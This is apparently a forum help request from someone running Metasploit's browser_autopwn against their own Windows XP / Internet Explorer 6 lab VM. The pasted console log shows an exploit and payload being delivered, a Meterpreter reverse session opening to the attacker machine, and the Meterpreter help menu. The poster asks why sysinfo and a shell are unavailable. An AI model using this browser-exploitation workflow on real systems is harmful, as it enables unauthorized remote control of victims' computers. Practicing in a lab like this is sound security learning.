hi i'm trying browser_autopwn
the target is VM with xp with explorer 6
this is what i'm getting :
Code:
...
..[*] --- Done, found 13 exploit modules
[*] Using URL: hxxp://0.0.0.0:8080/[*]  Local IP: hxxp://10.0.0.2:8080/[*] Server started.[*] Request '/' from 10.0.0.3:1288[*] Request '/?sessid=V2luZG93czpYUDpTUDA6ZW4tdXM6eDg2Ok1TSUU6Ni4wOg%3d%3d' from 
10.0.0.3:1288[*] JavaScript Report: Windows:XP:SP0:en-us:x86:MSIE:6.0:[*] Responding with exploits[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 10.0.0.3:1288...[*] Sending EXE payload to 10.0.0.3:1288...[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (723467 bytes)...[*] Upload completed.[*] Meterpreter session 1 opened (10.0.0.2:3333 -> 10.0.0.3:1313)

msf auxiliary(browser_autopwn) > sessions

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  10.0.0.2:3333 -> 10.0.0.3:1313

msf auxiliary(browser_autopwn) > sessions -i 1[*] Starting interaction with 1...

meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel
meterpreter >
but in the metasploit-unleashed manual i see them running sysinfo and getting windows shell but i can't